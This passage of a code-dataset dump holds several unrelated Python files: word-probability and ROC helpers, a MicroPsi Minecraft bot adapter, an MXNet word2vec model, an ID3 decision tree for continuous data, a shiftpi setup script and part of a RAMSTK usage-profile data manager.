xrange(0,N_Train):\n\t\tWords=Train[i][7].split()\n\t\tT_Count=np.zeros([N_Words,3])\n\t\tfor j in xrange(0,len(Words)):\n\t\t\tWord_Check=Words[j].strip('\"')\n\t\t\tWord_Check=Word_Check.strip('.')\n\t\t\tWord_Check=Word_Check.lower()\n\t\t\tif(Word_Check in Dictionary):\n\t\t\t\tDict_Index=Dictionary.index(Word_Check)\n\t\t\t\tT_Count[Dict_Index,0]=1\n\t\t\t\tif(Train[i][0]==1):\n\t\t\t\t\tT_Count[Dict_Index,1]=1\n\t\t\t\telse:\n\t\t\t\t\tT_Count[Dict_Index,2]=1\n\t\tCount=Count+T_Count\n\n\tProb=np.matrix([Count[:,0]/N_Train,Count[:,1]/Class_Count,Count[:,2]/(N_Train-Class_Count)])\n\treturn Prob\n\ndef ROC(Train,Prob,Save,N_Insult):\n\tN_Train=len(Train)\n\tBin_Width=0.01\n\tBins=np.arange(start=0.0,stop=1.0+Bin_Width,step=Bin_Width)\n\tN_Bins=len(Bins)\n\tFalse_Positives=np.empty([N_Bins])\n\tTrue_Positives=np.empty([N_Bins])\n\tfor i in xrange(0,N_Bins):\n\t\tTP_Count=0\n\t\tFP_Count=0\n\t\tfor j in xrange(0,N_Train):\n\t\t\tif(Prob[j]>=Bins[i]):\n\t\t\t\tif(Train[j][0]==1):\n\t\t\t\t\tTP_Count=TP_Count+1\n\t\t\t\telse:\n\t\t\t\t\tFP_Count=FP_Count+1\n\t\tTrue_Positives[i]=TP_Count/float(N_Insult)\n\t\tFalse_Positives[i]=FP_Count/float(FP_Count+N_Train-N_Insult)\n\tplt.plot(False_Positives,True_Positives)\n\tplt.xlim([0.0,1.0])\n\tplt.xlabel(\"False Positive Rate\")\n\tplt.ylim([0.0,1.0])\n\tplt.ylabel(\"True Positive Rate\")\n\tif(Save):\n\t\tplt.savefig(\"ROC.png\")\n\telse:\n\t\tplt.show()\n","sub_path":"Fcts.py","file_name":"Fcts.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"392471093","text":"import warnings\nfrom threading import Thread\nimport configparser\nfrom micropsi_core.world.world import World\nfrom micropsi_core.world.worldadapter import WorldAdapter\nfrom spock.plugins import DefaultPlugins\nfrom spock.client import Client\nfrom micropsi_core.world.minecraft import spockplugin\nfrom spock.plugins.helpers.clientinfo import ClientInfoPlugin\nfrom spock.plugins.helpers.move import MovementPlugin\nfrom spock.plugins.helpers.world import WorldPlugin\nfrom spock.plugins.core.event import EventPlugin\n\n\nclass Minecraft(World):\n \"\"\" mandatory: list of world adapters that are supported\"\"\"\n supported_worldadapters = ['MinecraftWorldadapter']\n\n assets = {\n 'x': 2048,\n 'y': 2048,\n }\n\n\n\n def __init__(self, filename, world_type=\"Minecraft\", name=\"\", owner=\"\", uid=None, version=1):\n from micropsi_core.runtime import add_signal_handler\n World.__init__(self, filename, world_type=world_type, name=name, owner=owner, uid=uid, version=version)\n self.current_step = 0\n self.data['assets'] = self.assets\n self.first_step = True\n self.chat_ping_counter = 0\n self.the_image = None\n\n plugins = DefaultPlugins\n plugins.append(ClientInfoPlugin)\n plugins.append(MovementPlugin)\n plugins.append(WorldPlugin)\n plugins.append(spockplugin.MicropsiPlugin)\n\n settings = {\n 'username': 'bot', #minecraft.net username or name for unauthenticated servers\n\t\t 'password': '', #Password for account, ignored if not authenticated\n\t\t 'authenticated': False, #Authenticate with authserver.mojang.com\n\t\t 'bufsize': 4096, #Size of socket buffer\n\t\t 'sock_quit': True, #Stop bot on socket error or hangup\n\t\t 'sess_quit': True, #Stop bot on failed session login\n\t\t 'thread_workers': 5, #Number of workers in the thread pool\n\t\t 'plugins': plugins,\n\t\t 'plugin_settings': {\n spockplugin.MicropsiPlugin: {\"worldadapter\": self},\n EventPlugin: {\"killsignals\": False}\n }, #Extra settings for plugins\n 'packet_trace': False,\n 'mc_username': \"sepp\",\n \"mc_password\": \"hugo\"\n }\n self.spock = Client(plugins=plugins, settings=settings)\n # the MicropsiPlugin will create self.spockplugin here on instantiation\n\n server_parameters = self.read_server_parameters()\n self.minecraft_communication_thread = Thread(target=self.spock.start, args=server_parameters)\n self.minecraft_communication_thread.start()\n add_signal_handler(self.kill_minecraft_thread)\n\n def step(self):\n World.step(self)\n\n def read_server_parameters(self):\n server = 'localhost'\n port = 25565\n\n try:\n config = configparser.ConfigParser()\n config.read_file(open('config.ini'))\n if 'minecraft_server' in config:\n server = config['minecraft_server']\n if 'minecraft_port' in config:\n port = config['minecraft_port']\n except OSError:\n warnings.warn('Could not read config.ini, falling back to defaults for minecraft server configuration.')\n\n return server, port\n\n def kill_minecraft_thread(self, *args):\n self.spockplugin.event.kill()\n self.minecraft_communication_thread.join()\n self.spockplugin.threadpool.shutdown(False)\n\n\nclass MinecraftWorldadapter(WorldAdapter):\n\n datasources = {'diamond_offset_x': 0,\n 'diamond_offset_z': 0,\n 'grd_stone': 0,\n 'grd_dirt': 0,\n 'grd_wood': 0,\n 'grd_coal': 0,\n 'obstcl_x+': 0,\n 'obstcl_x-': 0,\n 'obstcl_z+': 0,\n 'obstcl_z-': 0}\n datatargets = {'move_x': 0,\n 'move_z': 0}\n\n\n def update(self):\n \"\"\"called on every world simulation step to advance the life of the agent\"\"\"\n #find diamond\n bot_x = self.world.spockplugin.clientinfo.position['x']\n bot_y = self.world.spockplugin.clientinfo.position['y']\n bot_z = self.world.spockplugin.clientinfo.position['z']\n bot_coords = (bot_x, bot_y, bot_z)\n x_chunk = bot_x // 16\n z_chunk = bot_z // 16\n current_column = self.world.spockplugin.world.map.columns[(x_chunk, z_chunk)]\n current_section = current_column.chunks[int((bot_y - 1) // 16)]\n\n self.detect_groundtypes(bot_coords, current_section)\n self.detect_diamond(current_column, bot_coords, x_chunk, z_chunk)\n self.detect_obstacles(bot_coords, current_section)\n\n move_x = self.datatargets['move_x']\n move_z = self.datatargets['move_z']\n\n self.world.spockplugin.psi_dispatcher.dispatchPsiCommands(bot_coords, current_section, move_x, move_z)\n\n\n def detect_diamond(self, current_column, bot_coords, x_chunk, z_chunk):\n for y in range(0, 16):\n current_section = current_column.chunks[int((bot_coords[1] + y - 10 // 2) // 16)] #TODO explain formula\n if current_section != None:\n for x in range(0, 16):\n for z in range(0, 16):\n current_block = current_section.get(x, int((bot_coords[1] + y - 10 // 2) % 16), z).id #TODO explain formula\n if current_block == 56:\n diamond_coords = (x + x_chunk * 16,y,z + z_chunk * 16)\n self.datasources['diamond_offset_x'] = bot_coords[0] - diamond_coords[0]\n self.datasources['diamond_offset_z'] = bot_coords[2] - diamond_coords[2]\n\n\n def detect_groundtypes(self, bot_coords, current_section):\n block_below = current_section.get(int(bot_coords[0]) % 16, int((bot_coords[1] - 1) % 16), int(bot_coords[2]) % 16).id\n self.datasources['grd_dirt'] = 1 if (block_below == 2) else 0\n self.datasources['grd_stone'] = 1 if (block_below == 1) else 0\n self.datasources['grd_wood'] = 1 if (block_below == 17) else 0\n self.datasources['grd_coal'] = 1 if (block_below == 173) else 0\n\n\n def detect_obstacles(self, bot_coords, current_section):\n self.datasources['obstcl_x+'] = 1 if current_section.get(int(bot_coords[0] + 1) % 16, int((bot_coords[1] + 1) % 16), int(bot_coords[2]) % 16).id != 0 else 0\n self.datasources['obstcl_x-'] = 1 if current_section.get(int(bot_coords[0] - 1) % 16, int((bot_coords[1] + 1) % 16), int(bot_coords[2]) % 16).id != 0 else 0\n self.datasources['obstcl_z+'] = 1 if current_section.get(int(bot_coords[0]) % 16, int((bot_coords[1] + 1) % 16), int(bot_coords[2] + 1) % 16).id != 0 else 0\n self.datasources['obstcl_z-'] = 1 if current_section.get(int(bot_coords[0]) % 16, int((bot_coords[1] + 1) % 16), int(bot_coords[2] - 1) % 16).id != 0 else 0","sub_path":"micropsi_core/world/minecraft/minecraft.py","file_name":"minecraft.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587706312","text":"import os, sys\nsys.path.insert(0, \"../../python\")\nimport mxnet as mx\nimport numpy as np\n\ndef is_param_name(name):\n return name.endswith('weight')\\\n or name.endswith('bias')\\\n or name.endswith('gamma')\\\n or name.endswith('beta')\n\nclass SkipGram(object):\n def __init__(self, ctx, input_size, num_embed, batch_size, update_period, opt_params):\n self._build_model(ctx, input_size, num_embed, batch_size, opt_params)\n self._examples_passed = 0\n self.update_period = update_period\n self.input_size = input_size\n self.num_embed = num_embed\n self.batch_size = batch_size\n\n def _build_model(self, ctx, input_size, num_embed, batch_size, opt_params):\n input_weight = mx.sym.Variable('input_weight')\n output_weight = mx.sym.Variable('output_weight')\n middle_word = mx.sym.Variable('middle_word')\n ctx_word = mx.sym.Variable('ctx_word')\n label = mx.sym.Variable('label')\n\n input_embed = mx.sym.Embedding(data=middle_word,\n weight=input_weight,\n input_dim=input_size,\n output_dim=num_embed,\n name='input_embed')\n\n output_embed = mx.sym.Embedding(data=ctx_word,\n weight=output_weight,\n input_dim=input_size,\n output_dim=num_embed,\n name='output_embed')\n\n els_prod = input_embed * output_embed\n slice_layers = mx.sym.SliceChannel(data=els_prod,\n num_outputs=num_embed,\n name='slice_layer')\n slice_layers = [slice_layers[i] for i in range(num_embed)]\n els_sum = mx.sym.ElementWiseSum(*slice_layers,\n num_args=num_embed,\n name='elementwise_sum')\n\n sigmoid = mx.symbol.Activation(name='sigmoid',\n data=els_sum,\n act_type='sigmoid')\n\n model = mx.symbol.LogisticRegressionOutput(data=sigmoid, label=label, name='cross_entropy')\n\n arg_names = model.list_arguments()\n input_shapes = {}\n\n for name in arg_names:\n if name.endswith('word'):\n input_shapes[name] = (batch_size,)\n elif name.endswith('label'):\n input_shapes[name] = (batch_size,)\n\n arg_shape, out_shape, aux_shape = model.infer_shape(**input_shapes)\n arg_arrays = [mx.nd.zeros(s, ctx) for s in arg_shape]\n for i in range(len(arg_shape)):\n arg_arrays[i][:] = mx.rnd.uniform(-0.1, 0.1, arg_shape[i])\n\n arg_grad = {}\n for shape, name in zip(arg_shape, arg_names):\n if is_param_name(name):\n arg_grad[name] = mx.nd.zeros(shape, ctx)\n arg_dict = dict(zip(arg_names, arg_arrays))\n\n self.model = model\n self.label = label\n self.arg_arrays = arg_arrays\n self.arg_dict = arg_dict\n self.arg_grad = arg_grad\n\n grad_req = {}\n for name in arg_names:\n if name.endswith('word') or name.endswith('label'):\n grad_req[name] = 'null'\n else:\n grad_req[name] = 'write'\n\n self.embed_exec = model.bind(ctx=ctx,\n args=self.arg_dict,\n args_grad=self.arg_grad,\n grad_req=grad_req)\n\n\n params_blocks = []\n for i, name in enumerate(arg_names):\n if is_param_name(name):\n params_blocks.append((i, arg_dict[name], arg_grad[name], name))\n self.params_blocks = params_blocks\n\n opt = mx.optimizer.create('sgd', **opt_params)\n updater = mx.optimizer.get_updater(opt)\n self.updater = updater\n\n\n def fit(self, batch):\n middle_words = map(lambda x: x[0][0], batch)\n context_words = map(lambda x: x[0][1], batch)\n labels = map(lambda x: x[1], batch)\n mx.nd.array(middle_words).copyto(self.arg_dict['middle_word'])\n mx.nd.array(context_words).copyto(self.arg_dict['ctx_word'])\n mx.nd.array(labels).copyto(self.arg_dict['label'])\n self.embed_exec.forward(is_train=True)\n self.embed_exec.backward()\n\n self._examples_passed += 1\n if self._examples_passed % self.update_period == 0:\n for idx, weight, grad, name in self.params_blocks:\n self.updater(idx, grad, weight)\n grad[:] = 0.0\n\n def get_embedding_cpu(self):\n embedding = np.zeros((self.input_size, self.num_embed))\n self.arg_dict['input_weight'].copyto(embedding)\n\n return embedding\n","sub_path":"example/word2vec/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282447106","text":"\"\"\" Yoga database module \"\"\"\nfrom yogaflow.reader.abstract_reader import AbstractReader\n\nclass YogaDatabase:\n \"\"\" Yoga database class \"\"\"\n def __init__(self, reader: AbstractReader):\n self._reader = reader\n self.classes = reader.get_yoga_classes()\n self.pranayamas = reader.get_pranayamas()\n self.warmups = reader.get_warmups()\n self.asanas = reader.get_asanas()\n self.flows = reader.get_flows(self.asanas)\n self.meditations = reader.get_meditations()\n","sub_path":"yogaflow/reader/yoga_database.py","file_name":"yoga_database.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137161433","text":"from math import log\nfrom .noeud_de_decision_continu import NoeudDeDecision_continu\nfrom statistics import mean\n\n#import matplotlib.pyplot as plt\n\ndef binarise(input):\n if input < 0.5: return 0\n else: return 1\n\ndef variance(input):\n if len(input) > 1:\n return (1/len(input)) * sum(list(map(lambda x: float(x[0]) - mean(map(lambda x: float(x[0]),input)), input)))\n else:\n return 0\n\nclass ID3_continu:\n \"\"\" Algorithme ID3. \n\n This is an updated version from the one in the book (Intelligence Artificielle par la pratique).\n Specifically, in construit_arbre_recur(), if donnees == [] (line 70), it returns a terminal node with the predominant class of the dataset -- as computed in construit_arbre() -- instead of returning None.\n Moreover, the predominant class is also passed as a parameter to NoeudDeDecision().\n \"\"\"\n \n def construit_arbre(self, donnees):\n \"\"\" Construit un arbre de décision à partir des données d'apprentissage.\n\n :param list donnees: les données d'apprentissage\\\n ``[classe, {attribut -> valeur}, ...]``.\n :return: une instance de NoeudDeDecision_continu correspondant à la racine de\\\n l'arbre de décision.\n \"\"\"\n \n # Nous devons extraire les domaines de valeur des \n # attributs, puisqu'ils sont nécessaires pour \n # construire l'arbre.\n attributs = {}\n for donnee in donnees:\n for attribut, valeur in donnee[1].items():\n valeurs = attributs.get(attribut)\n if valeurs is None:\n valeurs = set()\n attributs[attribut] = valeurs\n valeurs.add(valeur)\n\n # Find the predominant class\n classes = set([row[0] for row in donnees])\n # print(classes)\n predominant_class_counter = -1\n for c in classes:\n # print([row[0] for row in donnees].count(c))\n if [row[0] for row in donnees].count(c) >= predominant_class_counter:\n predominant_class_counter = [row[0] for row in donnees].count(c)\n predominant_class = c\n # print(predominant_class)\n \n arbre = self.construit_arbre_recur(donnees, attributs, predominant_class)\n\n return arbre\n\n def construit_arbre_recur(self, donnees, attributs, predominant_class):\n \"\"\" Construit rédurcivement un arbre de décision à partir \n des données d'apprentissage et d'un dictionnaire liant\n les attributs à la liste de leurs valeurs possibles.\n\n :param list donnees: les données d'apprentissage\\\n ``[classe, {attribut -> valeur}, ...]``.\n :param attributs: un dictionnaire qui associe chaque\\\n attribut A à son domaine de valeurs a_j.\n :return: une instance de NoeudDeDecision_continu correspondant à la racine de\\\n l'arbre de décision.\n \"\"\"\n \n def classe_unique(donnees):\n \"\"\" Vérifie que toutes les données appartiennent à la même classe. \"\"\"\n \n if len(donnees) == 0:\n return True \n premiere_classe = donnees[0][0]\n for donnee in donnees:\n if donnee[0] != premiere_classe:\n return False \n return True\n\n def valeurs_possibles(donnees_input, attribut):\n values = list(map(lambda x : float(x[1][attribut]), donnees_input))\n return sorted(list(dict.fromkeys(values)))\n\n def partition(attribut):\n \n def score(cut):\n def pre_class(dataset):\n return binarise(mean(list(map(lambda x: float(x[0]), dataset))))\n\n lV = list(filter(lambda x: float(x[1][attribut]) <= cut, donnees))\n hV = list(filter(lambda x: float(x[1][attribut]) > cut, donnees))\n lS = self.h_C_A(lV, attribut, valeurs_possibles(lV,attribut)) #variance(lV)*len(lV) #len(list(filter(lambda x: int(x[0]) == int(pre_class(lV)), lV)))\n hS = self.h_C_A(hV, attribut, valeurs_possibles(hV,attribut))#variance(hV)*len(hV) #len(list(filter(lambda x: int(x[0]) == int(pre_class(hV)), hV)))\n\n return lS + hS\n\n vals = valeurs_possibles(donnees, attribut)\n cuts = [(vals[i]+vals[i-1])/2 for i in range(1,len(vals))]\n scores = [(score(cut),cut) for cut in cuts]\n thresh = max(scores, key =lambda x : x[0])[1]\n lV = list(filter(lambda x: float(x[1][attribut]) <= thresh, donnees))\n hV = list(filter(lambda x: float(x[1][attribut]) > thresh, donnees))\n return {'hV':hV, 'lV':lV, 'thresh':thresh}\n\n if donnees == []:\n return NoeudDeDecision_continu(None, [str(predominant_class), dict()], str(predominant_class))\n\n # Si toutes les données restantes font partie de la même classe,\n # on peut retourner un noeud terminal. \n elif classe_unique(donnees) or len(attributs) == 0:\n return NoeudDeDecision_continu(None, donnees, str(predominant_class))\n \n else:\n # Sélectionne l'attribut qui réduit au maximum l'entropie.\n h_C_As_attribs = [(self.h_C_A(donnees, attribut, attributs[attribut])/len(valeurs_possibles(donnees,attribut)), len(valeurs_possibles(donnees,attribut)),\n attribut) for attribut in attributs]\n \n #print(h_C_As_attribs)\n \n #print(h_C_As_attribs)\n attribut = min(h_C_As_attribs, key=lambda h_a: h_a[0])[2]\n\n #print(attribut)\n #print(len(donnees))\n\n if len(valeurs_possibles(donnees,attribut)) > 1:\n part = partition(attribut)\n \n # Crée les sous-arbres de manière récursive.\n attributs_restants = attributs.copy()\n del attributs_restants[attribut]\n \n #partitions = self.partitionne(donnees, attribut, attributs[attribut])\n \n enfants = {}\n enfants['low'] = self.construit_arbre_recur(part['lV'], attributs_restants, predominant_class)\n enfants['high'] = self.construit_arbre_recur(part['hV'], attributs_restants, predominant_class)\n return NoeudDeDecision_continu(attribut, donnees, str(predominant_class), enfants, seuil=part['thresh'])\n else: \n # Crée les sous-arbres de manière récursive.\n attributs_restants = attributs.copy()\n del attributs_restants[attribut]\n\n enfants = {}\n enfants['unique'] = self.construit_arbre_recur(donnees, attributs_restants, predominant_class)\n \n return NoeudDeDecision_continu(attribut, donnees, str(predominant_class), enfants)\n \n def p_aj(self, donnees, attribut, valeur):\n \"\"\" p(a_j) - la probabilité que la valeur de l'attribut A soit a_j.\n\n :param list donnees: les données d'apprentissage.\n :param attribut: l'attribut A.\n :param valeur: la valeur a_j de l'attribut A. \n :return: p(a_j)\n \"\"\"\n # Nombre de données.\n nombre_donnees = len(donnees)\n \n # Permet d'éviter les divisions par 0.\n if nombre_donnees == 0:\n return 0.0\n \n # Nombre d'occurrences de la valeur a_j parmi les données.\n nombre_aj = 0\n for donnee in donnees:\n if donnee[1][attribut] == valeur:\n nombre_aj += 1\n\n # p(a_j) = nombre d'occurrences de la valeur a_j parmi les données / \n # nombre de données.\n return nombre_aj / nombre_donnees\n\n def p_ci_aj(self, donnees, attribut, valeur, classe):\n \"\"\" p(c_i|a_j) - la probabilité conditionnelle que la classe C soit c_i\\\n étant donné que l'attribut A vaut a_j.\n\n :param list donnees: les données d'apprentissage.\n :param attribut: l'attribut A.\n :param valeur: la valeur a_j de l'attribut A.\n :param classe: la valeur c_i de la classe C.\n :return: p(c_i | a_j)\n \"\"\"\n # Nombre d'occurrences de la valeur a_j parmi les données.\n donnees_aj = [donnee for donnee in donnees if donnee[1][attribut] == valeur]\n nombre_aj = len(donnees_aj)\n \n # Permet d'éviter les divisions par 0.\n if nombre_aj == 0:\n return 0\n \n # Nombre d'occurrences de la classe c_i parmi les données pour lesquelles \n # A vaut a_j.\n donnees_ci = [donnee for donnee in donnees_aj if donnee[0] == classe]\n nombre_ci = len(donnees_ci)\n\n # p(c_i|a_j) = nombre d'occurrences de la classe c_i parmi les données \n # pour lesquelles A vaut a_j /\n # nombre d'occurrences de la valeur a_j parmi les données.\n return nombre_ci / nombre_aj\n\n def h_C_aj(self, donnees, attribut, valeur):\n \"\"\" H(C|a_j) - l'entropie de la classe parmi les données pour lesquelles\\\n l'attribut A vaut a_j.\n\n :param list donnees: les données d'apprentissage.\n :param attribut: l'attribut A.\n :param valeur: la valeur a_j de l'attribut A.\n :return: H(C|a_j)\n \"\"\"\n # Les classes attestées dans les exemples.\n classes = list(set([donnee[0] for donnee in donnees]))\n \n # Calcule p(c_i|a_j) pour chaque classe c_i.\n p_ci_ajs = [self.p_ci_aj(donnees, attribut, valeur, classe) \n for classe in classes]\n\n # Si p vaut 0 -> plog(p) vaut 0.\n return -sum([p_ci_aj * log(p_ci_aj, 2.0) \n for p_ci_aj in p_ci_ajs \n if p_ci_aj != 0])\n\n def h_C_A(self, donnees, attribut, valeurs):\n \"\"\" H(C|A) - l'entropie de la classe après avoir choisi de partitionner\\\n les données suivant les valeurs de l'attribut A.\n \n :param list donnees: les données d'apprentissage.\n :param attribut: l'attribut A.\n :param list valeurs: les valeurs a_j de l'attribut A.\n :return: H(C|A)\n \"\"\"\n # Calcule P(a_j) pour chaque valeur a_j de l'attribut A.\n p_ajs = [self.p_aj(donnees, attribut, valeur) for valeur in valeurs]\n\n # Calcule H_C_aj pour chaque valeur a_j de l'attribut A.\n h_c_ajs = [self.h_C_aj(donnees, attribut, valeur) \n for valeur in valeurs]\n\n return sum([p_aj * h_c_aj for p_aj, h_c_aj in zip(p_ajs, h_c_ajs)])\n","sub_path":"moteur_id3/id3_continu.py","file_name":"id3_continu.py","file_ext":"py","file_size_in_byte":10718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"92403381","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\nimport os\n\nrequirements = [i for i in open('requirements.txt').read().split() if not i.startswith('--') and len(i) > 0]\n\ndef get_long_description(fname):\n try:\n import pypandoc\n return pypandoc.convert(fname, 'rst')\n except:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(name='shiftpi',\n version=\"0.4.6\",\n description=\"ShiftPi is the easiest way to work with 74HC595 shift registers on your Raspberry Pi.\",\n author='Gwilyn Saunders',\n author_email='gwilyn.saunders@mk2es.com.au',\n url='https://git.mk2es.com.au/mk2/shiftpi',\n packages=['shiftpi'],\n install_requires=requirements,\n long_description=get_long_description('README.md'),\n classifiers=[\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: BSD',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Topic :: System :: Shells',\n 'Topic :: Utilities',\n ],\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302267014","text":"# -*- coding: utf-8 -*-\n#\n# ramstk.controllers.usage_profile.datamanager.py is part of The RAMSTK\n# Project\n#\n# All rights reserved.\n# Copyright 2007 - 2020 Doyle Rowland doyle.rowland reliaqual com\n\"\"\"Usage Profile Package Data Model.\"\"\"\n\n# Standard Library Imports\nimport inspect\nfrom typing import Any, Dict, List\n\n# Third Party Imports\nfrom pubsub import pub\nfrom treelib.exceptions import NodeIDAbsentError\n\n# RAMSTK Package Imports\nfrom ramstk.controllers import RAMSTKDataManager\nfrom ramstk.exceptions import DataAccessError\nfrom ramstk.models.programdb import (\n RAMSTKEnvironment, RAMSTKMission, RAMSTKMissionPhase\n)\n\n\nclass DataManager(RAMSTKDataManager):\n \"\"\"Contain the attributes and methods of the Usage Profile data manager.\n\n This class manages the usage profile data from the RAMSTKMission,\n RAMSTKMissionPhase, and RAMSKTEnvironment data models.\n \"\"\"\n\n _tag = 'usage_profile'\n\n def __init__(self, **kwargs: Dict[Any, Any]) -> None:\n \"\"\"Initialize a RAMSTKFailureDefinition, data manager instance.\"\"\"\n super().__init__(**kwargs)\n\n # Initialize private dictionary attributes.\n\n # Initialize private list attributes.\n\n # Initialize private scalar attributes.\n\n # Initialize public dictionary attributes.\n self.last_id: Dict[str, int] = {\n 'mission': -1,\n 'mission_phase': -1,\n 'environment': -1,\n }\n\n # Initialize public list attributes.\n\n # Initialize public scalar attributes.\n\n # Subscribe to PyPubSub messages.\n pub.subscribe(super().do_get_attributes,\n 'request_get_usage_profile_attributes')\n pub.subscribe(super().do_update_all,\n 'request_update_all_usage_profiles')\n\n pub.subscribe(self.do_select_all, 'selected_revision')\n pub.subscribe(self.do_get_tree, 'request_get_usage_profile_tree')\n pub.subscribe(self.do_update, 'request_update_usage_profile')\n\n pub.subscribe(self._do_delete, 'request_delete_usage_profile')\n pub.subscribe(self._do_insert_environment,\n 'request_insert_environment')\n pub.subscribe(self._do_insert_mission, 'request_insert_mission')\n pub.subscribe(self._do_insert_mission_phase,\n 'request_insert_mission_phase')\n pub.subscribe(self._do_set_attributes,\n 'request_set_usage_profile_attributes')\n pub.subscribe(self._do_set_attributes, 'lvw_editing_usage_profile')\n pub.subscribe(self._do_set_all_attributes,\n 'request_set_all_usage_profile_attributes')\n\n def do_get_tree(self) -> None:\n \"\"\"Retrieve the revision treelib Tree.\n\n :return: None\n :rtype: None\n \"\"\"\n pub.sendMessage(\n 'succeed_get_usage_profile_tree',\n tree=self.tree,\n )\n\n def do_select_all(self, attributes: Dict[str, Any]) -> None:\n \"\"\"Retrieve the Usage Profile data from the RAMSTK Program database.\n\n :param attributes: the attributes for the selected Revision.\n :return: None\n :rtype: None\n \"\"\"\n self._revision_id = attributes['revision_id']\n\n for _node in self.tree.children(self.tree.root):\n self.tree.remove_node(_node.identifier)\n\n for _mission in self.dao.do_select_all(RAMSTKMission,\n key=['revision_id'],\n value=[self._revision_id]):\n self.tree.create_node(tag='mission',\n identifier='{0:d}'.format(\n _mission.mission_id),\n parent=self._root,\n data={'usage_profile': _mission})\n self.last_id['mission'] = _mission.mission_id\n\n for _phase in self.dao.do_select_all(RAMSTKMissionPhase,\n key=['mission_id'],\n value=[_mission.mission_id]):\n self.tree.create_node(tag='mission_phase',\n identifier='{0:d}.{1:d}'.format(\n _mission.mission_id,\n _phase.phase_id),\n parent=str(_mission.mission_id),\n data={'usage_profile': _phase})\n self.last_id['mission_phase'] = _phase.phase_id\n\n for _environment in self.dao.do_select_all(\n RAMSTKEnvironment,\n key=['phase_id'],\n value=[_phase.phase_id]):\n self.tree.create_node(\n tag='environment',\n identifier='{0:d}.{1:d}.{2:d}'.format(\n _mission.mission_id, _phase.phase_id,\n _environment.environment_id),\n parent='{0:d}.{1:d}'.format(_mission.mission_id,\n _phase.phase_id),\n data={'usage_profile': _environment})\n self.last_id['environment'] = _environment.environment_id\n\n pub.sendMessage(\n 'succeed_retrieve_usage_profile',\n tree=self.tree,\n )\n\n def do_update(self, node_id: str) -> None:\n \"\"\"Update record associated with node ID in RAMSTK Program database.\n\n :param node_id: the node (usage profile) ID of the record to save.\n :return: None\n :rtype: None\n \"\"\"\n _method_name: str = inspect.currentframe( # type: ignore\n ).f_code.co_name\n\n try:\n self.dao.do_update(\n self.tree.get_node(node_id).data['usage_profile'])\n pub.sendMessage(\n 'succeed_update_usage_profile',\n tree=self.tree,\n )\n except AttributeError:\n _error_msg: str = (\n '{1}: Attempted to save non-existent usage profile ID {'\n '0}.').format(str(node_id), _method_name)\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error_msg,\n )\n pub.sendMessage(\n 'fail_update_usage_profile',\n error_message=_error_msg,\n )\n except (KeyError, TypeError):\n if node_id != 0:\n _error_msg = (\n '{1}: No data package found for usage profile ID {'\n '0}.').format(str(node_id), _method_name)\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error_msg,\n )\n pub.sendMessage(\n 'fail_update_usage_profile',\n error_message=_error_msg,\n )\n\n def _do_delete(self, node_id: int) -> None:\n \"\"\"Remove a usage profile element.\n\n :param node_id: the usage profile element ID to remove.\n :return: None\n :rtype: None\n \"\"\"\n try:\n super().do_delete(node_id, 'usage_profile')\n\n self.tree.remove_node(node_id)\n\n pub.sendMessage(\n 'succeed_delete_usage_profile',\n tree=self.tree,\n )\n except (DataAccessError, NodeIDAbsentError):\n _method_name: str = inspect.currentframe( # type: ignore\n ).f_code.co_name\n _error_msg: str = (\n '{1}: Attempted to delete non-existent usage profile ID {0}.'\n ).format(str(node_id), _method_name)\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error_msg,\n )\n pub.sendMessage(\n 'fail_delete_usage_profile',\n error_message=_error_msg,\n )\n\n def _do_insert_environment(self, mission_id: int, phase_id: int) -> None:\n \"\"\"Add a new environment for phase ID.\n\n :param mission_id: the mission ID to add the new environment.\n :param phase_id: the mission phase ID to add the new environment.\n :return: None\n :rtype: None\n \"\"\"\n try:\n _last_id = self.dao.get_last_id('ramstk_environment',\n 'environment_id')\n _environment = RAMSTKEnvironment()\n _environment.phase_id = phase_id\n _environment.environment_id = _last_id + 1\n\n self.dao.do_insert(_environment)\n\n _phase_id = '{0:s}.{1:s}'.format(str(mission_id), str(phase_id))\n _node_id = '{0:s}.{1:s}.{2:s}'.format(\n str(mission_id), str(phase_id),\n str(_environment.environment_id))\n self.tree.create_node(tag='environment',\n identifier=_node_id,\n parent=_phase_id,\n data={'usage_profile': _environment})\n self.last_id['environment'] = _environment.environment_id\n pub.sendMessage(\n \"succeed_insert_usage_profile\",\n node_id=_node_id,\n tree=self.tree,\n )\n except DataAccessError as _error:\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error.msg,\n )\n pub.sendMessage(\n \"fail_insert_usage_profile\",\n error_message=_error.msg,\n )\n\n def _do_insert_mission(self) -> None:\n \"\"\"Add a new mission for revision ID.\n\n :return: None\n :rtype: None\n \"\"\"\n try:\n _last_id = self.dao.get_last_id('ramstk_mission', 'mission_id')\n _mission = RAMSTKMission()\n _mission.revision_id = self._revision_id\n _mission.mission_id = _last_id + 1\n\n self.dao.do_insert(_mission)\n\n _node_id = '{0:d}'.format(_mission.mission_id)\n\n self.tree.create_node(tag='mission',\n identifier=_node_id,\n parent=self._root,\n data={'usage_profile': _mission})\n self.last_id['mission'] = _mission.mission_id\n pub.sendMessage(\n \"succeed_insert_usage_profile\",\n node_id=_node_id,\n tree=self.tree,\n )\n 